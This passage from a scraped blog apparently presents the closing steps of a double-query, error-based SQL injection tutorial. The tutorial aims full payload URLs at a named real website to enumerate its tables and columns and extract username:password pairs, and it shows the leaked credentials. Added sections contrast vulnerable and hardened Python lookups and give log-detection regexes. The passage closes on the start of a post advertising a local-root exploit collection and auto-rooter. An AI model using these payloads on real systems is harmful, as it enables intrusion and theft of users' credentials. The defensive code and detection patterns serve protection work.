line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">So the query with the URL will look like:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot:</span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler</div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: AVmxf.png]" border="0" height="516" src="http://i.imgur.com/AVmxf.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
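<br /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Added example, not part of the original tutorial: everything above depends on two application-side defects, the id parameter being spliced into the SQL text and the database error being echoed into the page. The SQLite table, its rows and both handler functions below are constructed to show that vulnerable pattern beside a hardened one; only the payload shape comes from the tutorial.</span><br />

```python
"""Added example (not from the tutorial): the vulnerable request-handler
pattern that error-based / double-query injection relies on, beside a
hardened version. The 'pages' table, its rows and both handlers are
constructed for the demo; SQLite stands in for the site's MySQL server."""
import logging
import re
import sqlite3
from typing import Tuple

log = logging.getLogger(__name__)

# The payload shape used throughout the tutorial, kept here only as test input.
DOUBLE_QUERY_PAYLOAD = (
    "151 and (select 1 from (select count(*) from (select 1 union select 2 "
    "union select 3)x group by concat(mid((select concat_ws(0x7e,version(),"
    "0x7e) from information_schema.tables limit 0,1),1,25),floor(rand(0)*2)))a)-- x"
)

ID_PATTERN = re.compile(r"[0-9]{1,10}")  # what a legitimate ?id= value looks like


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(150, "About"), (151, "News"), (152, "Contact")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> Tuple[int, str]:
    """Defect 1: raw_id is pasted into the SQL text, so whatever follows the
    number becomes part of the WHERE clause.
    Defect 2: the driver's error message is echoed to the visitor, which is
    the channel the 'Duplicate entry ... for key group_key' trick reads from."""
    try:
        row = conn.execute(f"SELECT title FROM pages WHERE id={raw_id}").fetchone()
    except sqlite3.Error as exc:
        return 500, f"Database error: {exc}"
    return (200, row[0]) if row else (404, "Not found")


def hardened_lookup(conn: sqlite3.Connection, raw_id: str) -> Tuple[int, str]:
    """Fix 1: reject anything that is not a plain integer before it reaches SQL.
    Fix 2: bind the value through a placeholder, so it can only ever be data.
    Fix 3: keep the driver's error text in the server log, never in the page."""
    if not ID_PATTERN.fullmatch(raw_id):
        return 400, "Invalid id"
    try:
        row = conn.execute("SELECT title FROM pages WHERE id=?",
                           (int(raw_id),)).fetchone()
    except sqlite3.Error as exc:
        log.error("lookup failed for id=%s: %s", raw_id, exc)
        return 500, "Internal error"
    return (200, row[0]) if row else (404, "Not found")


if __name__ == "__main__":
    db = make_db()
    for handler in (vulnerable_lookup, hardened_lookup):
        print(handler.__name__, "normal request:", handler(db, "151"))
        print(handler.__name__, "payload:", handler(db, DOUBLE_QUERY_PAYLOAD))
```

With the hardened handler the payload never reaches the database, and even a genuine database failure returns a generic message, so the error text that this whole technique reads from is no longer available to the visitor.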
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Now for the columns in the specified table i.e users</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Notice you have to convert the current table to Hex.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">To do that, you can go to </span><a href="http://www.swingnote.com/tools/texttohex.php" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">http://www.swingnote.com/tools/texttohex.php</a><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Now notice the mid() function</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">I've incremented from 1,25 to 4,25</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Result:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">'username,password,email,n1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot: </span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: oOnBR.png]" border="0" height="425" src="http://i.imgur.com/oOnBR.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
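The request above only works because the site pastes the <code>id</code> parameter straight into its SQL text and hands the database's error message back to the browser. The following is an added example, not code from the tutorial or from the site it targets: the vulnerable lookup pattern beside its hardened form. It uses an in-memory SQLite table called <code>news</code> as a constructed stand-in for the real backend, so the tutorial's payload fails here with a driver error instead of disclosing column names; that echoed error string is still exactly the channel error-based injection reads, and the hardened version closes it by validating the type, binding the value, and returning only a generic message.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the tutorial's index.php?id=... lookup: an in-memory SQLite
# table named "news" (hypothetical; the tutorial never shows the real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(150, "Article 150"), (151, "Article 151")])
    return conn

# The id parameter from the tutorial's column-name URL, with its spaces written as '+'
# the way a browser sends them.
TUTORIAL_ID_PARAM = (
    "151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x"
    "+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)"
    "+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),1,25),"
    "floor(rand(0)*2)))a)--+x"
)

def lookup_unsafe(conn, raw_id):
    """The vulnerable pattern: the raw parameter is pasted into the SQL text and the
    driver's error message is handed back to the caller (on the real site, to the
    browser). Returns (rows, error_text)."""
    sql = "SELECT title FROM news WHERE id=" + unquote_plus(raw_id)
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        # Echoing this string is the channel that error-based injection reads.
        return None, str(exc)

def lookup_safe(conn, raw_id):
    """Hardened form: validate the type, bind the value as a parameter, and never
    return driver error text. Returns (rows, error_text)."""
    value = unquote_plus(raw_id).strip()
    if not re.fullmatch(r"[0-9]+", value):
        return [], "invalid id"          # generic message; the detail belongs in the server log
    try:
        rows = conn.execute("SELECT title FROM news WHERE id=?", (int(value),)).fetchall()
    except sqlite3.Error:
        return [], "internal error"      # still generic: no table, column or syntax detail leaves
    return rows, None

if __name__ == "__main__":
    db = make_db()
    print(lookup_unsafe(db, "151"))
    print(lookup_unsafe(db, TUTORIAL_ID_PARAM))   # (None, '<driver error text>')
    print(lookup_safe(db, TUTORIAL_ID_PARAM))     # ([], 'invalid id')
```

The point of the hardened version is not only the bound parameter: even a parameterized query leaks if the application prints the driver's exception, so the generic "internal error" branch matters as much as the `?` placeholder.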
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;">Now to extract the data from the desired columns</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Columns we have so far: "username", "password"</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user name,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Notice how I didn't increment the mid() function</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">This is because the content is completely shown</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-style: italic; margin: 0px; padding: 0px;">Note: You can tell that the data is completely shown when a <span style="margin: 0px; padding: 0px;"><span style="font-weight: bold; margin: 0px; padding: 0px;">~</span></span> sign (or signs) appears in the output</span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot:</span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: 057wa.png]" border="0" height="399" src="http://i.imgur.com/057wa.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="640" /></div>
</div>
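From the defender's side, the two strings this post depends on are also the two things to alert on: the <code>floor(rand(0)*2)</code> / <code>group by concat(</code> construction in the request, and the <code>Duplicate entry '…' for key 'group_key'</code> error in the response or application log. The following is an added example and not part of the post: a small Python detector with a hypothetical rule set that flags such requests in access-log lines, and a parser for the leaked error line that applies the post's own <code>~</code> rule so an incident responder can see what was disclosed and whether the value was complete. The log lines are constructed samples built from the URL and the two errors quoted above, not real logs.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the double-query technique the post walks through.
# Hypothetical rule set, limited to constructs that appear in the post's own URLs.
PROBE_SIGNATURES = {
    "rand_floor":   re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "group_concat": re.compile(r"group\s+by\s+concat\s*\(", re.I),
    "info_schema":  re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "tilde_wrap":   re.compile(r"concat_ws\s*\(\s*0x7e", re.I),
}

# Response-side signature: the MySQL error (ER_DUP_ENTRY, 1062) the technique turns into an oracle.
GROUP_KEY_ERROR = re.compile(r"Duplicate entry '(?P<entry>[^']*)' for key '(?P<key>[^']+)'")

def probe_hits(uri):
    """Names of the signatures matched by a request line, after URL-decoding it."""
    decoded = unquote_plus(uri)
    return [name for name, rx in PROBE_SIGNATURES.items() if rx.search(decoded)]

def parse_group_key_error(text):
    """Triage a 'Duplicate entry' error: what was disclosed and whether it was the whole value.
    The post's payload makes entry = mid(concat_ws('~', data, '~'), n, 25) || floor(rand(0)*2),
    so the last character is the 0/1 from rand() and a '~' marks the end of the data."""
    m = GROUP_KEY_ERROR.search(text)
    if not m or not m.group("entry"):
        return None
    entry = m.group("entry")
    fragment, rand_bit = entry[:-1], entry[-1]
    return {
        "key": m.group("key"),
        "fragment": fragment,
        "rand_bit": rand_bit,
        "complete": "~" in fragment,             # the post's rule: a ~ means the data is fully shown
        "disclosed": fragment.split("~", 1)[0],  # data before the first delimiter
    }

def scan_log(lines):
    """Run both detectors over log lines and return one alert per finding."""
    alerts = []
    for n, line in enumerate(lines, 1):
        hits = probe_hits(line)
        if hits:
            alerts.append({"line": n, "type": "sqli_probe", "signatures": hits})
        leak = parse_group_key_error(line)
        if leak:
            alerts.append({"line": n, "type": "error_disclosure", **leak})
    return alerts

# Constructed sample lines (not real logs): a benign request, the post's column-name
# request, and the two MySQL errors quoted in the post as an application log would record them.
SAMPLE_LINES = [
    '10.0.0.5 - - [04/Sep/2013:23:06:00 -0700] "GET /new/index.php?id=151 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [04/Sep/2013:23:06:05 -0700] "GET /new/index.php?id=151+and+(select+1+from+'
    '(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+'
    'concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns+where+'
    'table_name=0x7573657273+limit+0,1),1,25),floor(rand(0)*2)))a)--+x HTTP/1.1" 500 611',
    "app.log: MySQL error 1062: Duplicate entry 'username,password,email,n1' for key 'group_key'",
    "app.log: MySQL error 1062: Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LINES):
        print(alert)
```

Decoding before matching matters: the signatures are written against the decoded query, so `+` and `%28`-style encodings do not hide them. The `complete` flag is the same test the post describes for the attacker, turned around: if the fragment already contains a `~`, the whole value left the database in that one error.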
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-83610302788130256082013-09-04T22:56:00.000-07:002013-09-04T22:56:21.226-07:00All Local Root Exploits 2005 - 2013 + Auto Rooter !<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="background-color: white; color: rgb(2, 187, 114) !important; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 24px; line-height: 28px; margin-bottom: 15px; text-align: center; text-transform: capitalize;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP4L8Wjqa7-2iV9QZEtTZB9iYgudrIKKjDiE8Ta9KqQiWb89ruBYr5yjDn5ibHvejYUTJG7Y7btuoHCextw1S0BOLakApO3JO3vkGo-yq-_QJcSGJsehKxShDNeTEDI3PZS9op46Pd0aQ/s640/hackers+cover+photos+by+www.kidsec.com.jpg" /></h2>
<h2 style="background-color: white; color: rgb(2, 187, 114) !important; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 24px; line-height: 28px; margin-bottom: 15px; text-align: center; text-transform: capitalize;">
All Kernels Have Been Exploited - Ultimate Local Roots Collection XD</h2>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Hey guys, what's up? Tired of searching for local roots again and again?</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Well, your problem is solved now :D</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">I have something for you: the ultimate collection of all local roots!</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">OK, what will you get in this collection?</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: Georgia, 'Times New Roman', serif;">================================</span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif;"><b><span style="color: lime;"><span style="line-height: 18px; text-align: left;">-2006</span><br style="line-height: 18px; text-align: left;" /><span style="line-height: 18px; text-align: left;">2007</span><br style="line-height: 18px; text-align: left;" /><span style="line-height: 18px; text-align: left;">2008</span><br style="line-height: 18px; text-align: left;" /><span style="line-height: 18px; text-align: left;">2009</span></span><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: lime;"><br />2010<br />2011- By H4x0rl1f3 Our Bro !</span><br /><span style="color: red;">-2.6.18 2012</span><br /><span style="color: red;">2.6.32 2012 and 2013 - By My Bro Abdul Ghaffar Aka gujjar Haxor PCP</span><br /><span style="color: lime;">FreeBSD 7,7.1,8 The Rest By </span></span></b></span><span style="background-color: #f7f7f7; font-size: 12px; line-height: 15px; text-align: left; white-space: pre-wrap;"><span style="color: lime; font-family: 'Trebuchet MS', sans-serif;"><b>Ch3rn0by1 From PMH!</b></span></span><span style="font-family: 'Trebuchet MS', sans-serif;"><b><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><br /><span style="color: red;">Autoroot 2011 And 2012 And 2013</span><br /><span style="color: red;">And Also Windows NT User Privilege Escalation</span></span></b></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
